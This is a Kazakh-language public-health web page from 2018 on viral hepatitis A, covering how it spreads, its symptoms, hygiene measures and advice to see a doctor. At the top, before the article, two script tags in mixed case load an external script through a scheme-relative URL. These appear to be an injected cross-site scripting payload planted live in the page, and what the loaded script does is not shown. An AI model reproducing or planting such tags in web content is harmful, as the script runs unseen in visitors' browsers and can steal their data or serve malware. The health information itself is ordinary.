<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.01.2018

Вирустық А гепатиті – бауырдың жұқпалы ауруы. Гепатит А – тек ауру адамнан жұғады. Гепатит А-ның вирусы адам ағзасына су, тамақ, кір қол және лас ыдыс-аяқ, үй керек-жарақтары арқылы түседі. Жеке адам гигиенасын сақтамағандықтан вирустық гепатит А-ны жұқтыруға болады.

Гепатит А-ның негізгі белгілері (вирустық гепатиттің барлық түрлеріне тән):

· Тәбеттің төмендеуі

· Оң қабырғаның астының ауруы

· Дене қызуының көтерілуі 37,5С

· Жүректің айнуы, кейде құсу

· Әлсіздік, дімкәстік

· Зәрдің түсінің қоңырлануы

· Үлкен дәреттің түсінің ағаруы

· Таңдайдың, көз ағының сарғаюы, кейінірек терінің сарғаюы кейде ауырған адамда сарғаю болмауы мүмкін.

Қорғану шаралары 
Жеке адам гигиенасын сақтау:

· Қайнатылған, немесе өз шөлмегіндегі суды ішу

· Тамақ ішер алдында, дәретханадан кейін, серуендеп келгеннен кейін қолыңызды сабындап жууды әдетке айналдырыңыз

Қоғамдық гигиенаны сақтау:

· Ашық су айдындарынан суды ішуге, тамақ жасауға және ыдыс-аяқ жууға қолданбаңыз

· Көкіністер мен жемістерді қолданар алдында жақсылап мұқият жуыңыз.

 Вирустық Гепатит А ауруының бірінші белгілері пайда болса, бірден дәрігерлерге барыңыз.

 

Просмотров: 680


Пікір қосу



Деректерді қолтаңбаға қосу
Текст